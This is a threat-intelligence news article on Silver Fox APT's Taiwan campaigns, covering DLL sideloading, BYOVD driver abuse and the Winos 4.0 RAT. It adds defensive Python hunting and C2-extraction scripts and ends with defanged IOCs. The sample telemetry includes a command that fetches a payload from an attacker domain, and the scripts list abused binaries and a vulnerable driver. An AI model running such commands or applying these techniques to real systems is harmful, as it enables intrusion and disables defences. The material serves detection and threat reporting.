GBHackers

Silver Fox APT Deploys DLL Sideloading and BYOVD in Advanced Malware Campaign


Silver Fox APT is running a new wave of targeted attacks in Taiwan that combine DLL sideloading and Bring Your Own Vulnerable Driver (BYOVD) techniques to deploy Winos 4.0 (ValleyRat) while aggressively disabling security tools.

The campaigns rely on highly localized tax and e‑invoice lures and fast‑changing infrastructure, making them difficult to block with static indicators alone.

Emails and download pages mimic official tax audit notices, e‑invoice portals, and tax filing installers, tricking users into opening weaponized archives or clicking embedded links.

In the first campaign, victims receive a RAR archive named “taxIs_RX3001.rar,” which contains a benign decoy document and a malicious LNK shortcut.

FortiGuard Labs recently documented several phishing campaigns that impersonate Taiwan’s tax authorities and related financial services to target local organizations.

The LNK uses a relative path to launch cmd.exe and runs a chain of obfuscated commands that creates a working directory under %Public%\501, copies the legitimate curl.exe to url.exe for masquerading, and then downloads a payload named Setup64.exe from attacker‑controlled infrastructure (bqdrzbyq[.]cn).

The resources of the downloaded executable (Source : FortiGuard Labs).

The downloaded installer, presented as a 64‑bit “special edition” package, extracts an embedded executable resource (“EXPAND”) into C:\ProgramData\Golden, forming the base for later deployment of Winos 4.0 and its driver component.

DLL Sideloading and Infrastructure

A second campaign shifts from LNK‑based downloaders to DLL sideloading via legitimate Taiwanese applications distributed in tax- or e-invoice-themed archives.

Phishing links such as hxxp://taxfnat[.]tw/ and fake e‑invoice URLs are used to redirect victims to China‑hosted cloud storage (tos-cn-shanghai.volces[.]com), where E‑Invoice.rar archives contain both a trusted executable and a malicious DLL.

When the user runs the legitimate‑looking tax application, it sideloads the attacker’s DLL, which in turn deploys the same driver‑based evasion and Winos 4.0 backdoor used in the initial LNK campaign and connects to a shared C2 address.


The execution file and the malicious DLL file (Source : FortiGuard Labs).

Analysis of the DLL’s PDB path shows an internal project name “大馬專案(二)” (“Big Horse Project (2)”), and related samples reference another tax application used for sideloading, with the C2 later moving to 154[.]91[.]64[.]246.

Domain registration data for these and earlier tax‑themed operations shows recurring patterns in registrant identity and reuse of the same Winos 4.0 C2 (47[.]76[.]86[.]151) across campaigns dating back to early 2026, reinforcing attribution to a focused Silver Fox subgroup.

The final payload is Winos 4.0 (also known as ValleyRat), a Gh0st‑derived remote access trojan widely associated with Silver Fox operations.

Before enabling its core features, the malware checks for administrative rights and, if necessary, elevates privileges using a UAC bypass that abuses the AppInfo service and trusted system binaries to avoid user prompts.

Attacker’s domain (Source : FortiGuard Labs).

It then launches a BYOVD sequence that loads a vulnerable, validly signed kernel driver, wsftprm.sys (Topaz OFD / Topaz Antifraud), by resolving native APIs such as NtLoadDriver and RtlAdjustPrivilege directly from ntdll.dll.

The vulnerable wsftprm.sys driver is known to allow low‑privileged code to terminate Protected Process Light (PPL) processes, including Microsoft Defender components, via crafted IOCTL calls. The earlier elevation step is a prerequisite for this stage rather than optional hardening: NtLoadDriver requires SeLoadDriverPrivilege, which a standard user token does not hold.

After gaining kernel privileges, Winos 4.0 iterates over running processes and terminates an extensive list of security products from vendors such as Microsoft, Trend Micro, Symantec, HuoRong, 360, and others, ensuring a clean environment for persistence and remote control.
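The three host‑level behaviours described above (the LNK chain renaming curl.exe to url.exe, the unsigned DLL sideloaded from beside a trusted executable, and the wsftprm.sys driver load from a non‑standard path) each leave a distinct trace in endpoint telemetry. The script below is an added example, not code from FortiGuard Labs or from the malware: it runs one hunting rule per behaviour over Sysmon‑style events (EventID 1 process creation, 7 image load, 6 driver load) flattened to one "Key: value" line each. The field names follow Sysmon, but the event lines, user names and file paths are constructed for illustration, and the driver check matches by file name only, where a production rule would match hashes against the Microsoft vulnerable driver blocklist.

```python
"""Hunting rules for three Silver Fox host behaviours over Sysmon-style events.

Added example: the event lines below are constructed, not real telemetry.
Field names follow Sysmon (EventID 1 ProcessCreate, 7 ImageLoad, 6 DriverLoad).
"""
from pathlib import PureWindowsPath

# Constructed sample telemetry: one flattened "Key: value | Key: value" event per line.
# Hostnames are defanged; paths echo the article but are assumptions.
SAMPLE_EVENTS = r"""
EventID: 1 | Image: C:\Users\Public\501\url.exe | OriginalFileName: curl.exe | ParentImage: C:\Windows\System32\cmd.exe | CommandLine: url.exe -o Setup64.exe hxxp://bqdrzbyq[.]cn/Setup64.exe
EventID: 1 | Image: C:\Windows\System32\curl.exe | OriginalFileName: curl.exe | ParentImage: C:\Windows\explorer.exe | CommandLine: curl.exe --version
EventID: 7 | Image: C:\Users\victim\Downloads\E-Invoice\TaxApp.exe | ImageLoaded: C:\Users\victim\Downloads\E-Invoice\helper.dll | Signed: false
EventID: 7 | Image: C:\Program Files\Vendor\App.exe | ImageLoaded: C:\Windows\System32\kernel32.dll | Signed: true
EventID: 6 | ImageLoaded: C:\ProgramData\Golden\wsftprm.sys | Signed: true | Signature: Topaz (constructed)
EventID: 6 | ImageLoaded: C:\Windows\System32\drivers\afd.sys | Signed: true | Signature: Microsoft Windows
"""

# Binaries attackers copy under a new name to dodge name-based rules. Sysmon's
# OriginalFileName comes from the PE version resource, so a rename does not change it.
DOWNLOADER_BINARIES = {"curl.exe", "certutil.exe", "bitsadmin.exe"}
# "c:\program files" also covers "c:\program files (x86)" as a prefix.
TRUSTED_ROOTS = (r"c:\windows", r"c:\program files")
DRIVER_DIR = r"c:\windows\system32\drivers"
# Name-based for illustration only; production rules should match SHA256 hashes
# against the Microsoft vulnerable driver blocklist or LOLDrivers.
BLOCKLISTED_DRIVERS = {"wsftprm.sys"}


def parse_event(line):
    """Turn 'Key: value | Key: value' into a dict (split on the first ': ' only)."""
    fields = {}
    for part in line.split(" | "):
        key, _, value = part.partition(": ")
        fields[key.strip()] = value.strip()
    return fields


def _under(path, roots):
    return any(str(path).lower().startswith(root) for root in roots)


def check_renamed_downloader(ev):
    """Rule 1: a known downloader whose on-disk name differs from its PE name."""
    image = PureWindowsPath(ev.get("Image", ""))
    original = ev.get("OriginalFileName", "").lower()
    if original in DOWNLOADER_BINARIES and image.name.lower() != original:
        return f"{original} running as {image}"
    return None


def check_sideload(ev):
    """Rule 2: an unsigned DLL loaded from the executable's own directory,
    outside Windows and Program Files (classic sideloading from an archive)."""
    image = PureWindowsPath(ev.get("Image", ""))
    loaded = PureWindowsPath(ev.get("ImageLoaded", ""))
    same_dir = str(image.parent).lower() == str(loaded.parent).lower()
    signed = ev.get("Signed", "").lower() == "true"
    if same_dir and loaded.suffix.lower() == ".dll" and not signed and not _under(loaded, TRUSTED_ROOTS):
        return f"{image.name} loaded unsigned {loaded}"
    return None


def check_driver_load(ev):
    """Rule 3: a driver on the blocklist, or loaded from outside the drivers directory."""
    loaded = PureWindowsPath(ev.get("ImageLoaded", ""))
    if loaded.name.lower() in BLOCKLISTED_DRIVERS or not _under(loaded, (DRIVER_DIR,)):
        return f"driver {loaded} is blocklisted or outside {DRIVER_DIR}"
    return None


RULES = {
    "1": ("renamed_downloader", check_renamed_downloader),
    "7": ("dll_sideload", check_sideload),
    "6": ("suspicious_driver", check_driver_load),
}


def hunt(events_text):
    """Return (rule_name, detail) for every event that trips a rule."""
    hits = []
    for line in events_text.strip().splitlines():
        ev = parse_event(line)
        rule = RULES.get(ev.get("EventID"))
        if rule is None:
            continue
        name, check = rule
        detail = check(ev)
        if detail:
            hits.append((name, detail))
    return hits


if __name__ == "__main__":
    for name, detail in hunt(SAMPLE_EVENTS):
        print(f"[{name}] {detail}")
```

Run against the constructed events, the script flags the renamed url.exe, the unsigned helper.dll beside TaxApp.exe, and the wsftprm.sys load from C:\ProgramData\Golden, and stays quiet on the benign curl.exe, kernel32.dll and afd.sys lines. The sideloading rule deliberately ignores Windows and Program Files so that legitimately installed applications loading their own DLLs do not alert; the trade-off is that a sideload staged into Program Files by an already elevated attacker needs a separate rule keyed on signature status or file creation time.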

C2, Plugin Architecture, and Attribution

Winos 4.0 hides its C2 address 47[.]76[.]86[.]151 using Base64‑encoded configuration data and only connects after confirming the victim’s system version.
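Hiding the C2 as Base64 in the configuration block defeats a plain string search, but not a search that decodes every Base64‑looking run and tests the result. The extractor below is an added example, not FortiGuard tooling or Winos 4.0 code: it scans a byte blob for Base64 runs, tries the three possible alignments (a config string rarely starts on a 4‑character boundary of the surrounding run), and keeps decoded strings that parse as an IPv4 address with an optional port. The sample blob is built inline from the article's C2 address and a decoy string; no port is assumed because the article gives none.

```python
"""Recover a Base64-hidden C2 address from a binary blob.

Added example, not Winos 4.0 code or FortiGuard tooling. The blob is constructed.
"""
import base64
import binascii
import re

# Runs of Base64 alphabet long enough to hold an IPv4 address (12 chars = 9 bytes).
B64_RUN = re.compile(rb"[A-Za-z0-9+/]{12,}={0,2}")
IPV4_PORT = re.compile(rb"\b(?:\d{1,3}\.){3}\d{1,3}(?::\d{1,5})?\b")

# Constructed sample: PE-like header bytes, a decoy string and the article's C2
# address, both Base64-encoded at build time so the block runs offline.
SAMPLE_BLOB = (
    b"MZ\x90\x00" + b"\x00" * 8
    + base64.b64encode(b"system version check") + b"\x00"
    + base64.b64encode(b"47.76.86.151") + b"\x00"
    + b"\xcc" * 4
)


def decode_candidates(blob):
    """Yield decoded bytes for every Base64 run at each of the three alignments."""
    for match in B64_RUN.finditer(blob):
        token = match.group(0).rstrip(b"=")
        for shift in range(3):
            core = token[shift:]
            padded = core + b"=" * (-len(core) % 4)
            try:
                yield base64.b64decode(padded, validate=True)
            except (binascii.Error, ValueError):
                # Length 1 mod 4 or stray characters: not valid Base64 at this shift.
                continue


def _valid_ipv4(text):
    """Reject regex matches such as 999.1.1.1 whose octets exceed 255."""
    host = text.split(":")[0]
    return all(int(octet) <= 255 for octet in host.split("."))


def extract_c2(blob):
    """Return sorted unique host[:port] strings found inside decoded Base64 runs."""
    found = set()
    for decoded in decode_candidates(blob):
        for hit in IPV4_PORT.findall(decoded):
            text = hit.decode("ascii")
            if _valid_ipv4(text):
                found.add(text)
    return sorted(found)


if __name__ == "__main__":
    for c2 in extract_c2(SAMPLE_BLOB):
        print("C2 candidate:", c2)
```

On the constructed blob the decoy decodes cleanly but contains no address and is dropped, while the second run yields 47.76.86.151. Real samples often XOR or otherwise wrap the Base64 layer, so this is the inner step of a config extractor rather than the whole one, and the alignment loop is what keeps it working when the encoded field is embedded inside a longer run of alphabet characters.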

C2 connection and the downloaded online module (Source : FortiGuard Labs).

Once online, it retrieves an “online module” DLL and additional plugins, including file management, multiple screen‑capture variants, and system management components, some of which are stored directly in the registry to support fileless, memory‑resident execution.

Previous reporting has shown that such Winos 4.0/ValleyRat modules log keystrokes, capture screenshots, read clipboard contents, and harvest data from applications such as online banking and messaging platforms.

Infrastructure links, reuse of the Winos 4.0/ValleyRat codebase, and overlaps in driver abuse and project identifiers all align with prior Silver Fox APT activity targeting Taiwan and other Asian regions.

For defenders, this campaign underscores the need to monitor for DLL sideloading behavior, block vulnerable drivers like wsftprm.sys, and treat unsolicited tax‑ or invoice‑related archives and links as high‑risk, especially when they originate from non‑verified sources.

IOCs

IP Addresses

IP Address | Description
47[.]76[.]86[.]151 | Winos 4.0 C2 address, reused across the tax-themed campaigns
154[.]91[.]64[.]246 | Later C2 address referenced by the related sideloading samples

Domains

Domain | Notes
bqdrzbyq[.]cn | Hosted the Setup64.exe payload fetched by the LNK chain
taxfnat[.]tw | Phishing link with Taiwan tax-themed naming
njhwuyklw[.]com | Likely random-generated
twtaxgo[.]cn | Used in a malicious URL
taxhub[.]tw | Impersonates a tax-related service
taukeny[.]com | Randomized domain structure
taxpro[.]tw | Taiwanese tax-themed naming
lmaxjuyh[.]cn | Possible command-and-control domain
tkooyvff[.]cn | Suspicious structure
etaxtw[.]cn | Mimics the legitimate Taiwanese tax system
twswsb[.]cn | Obfuscated hostname
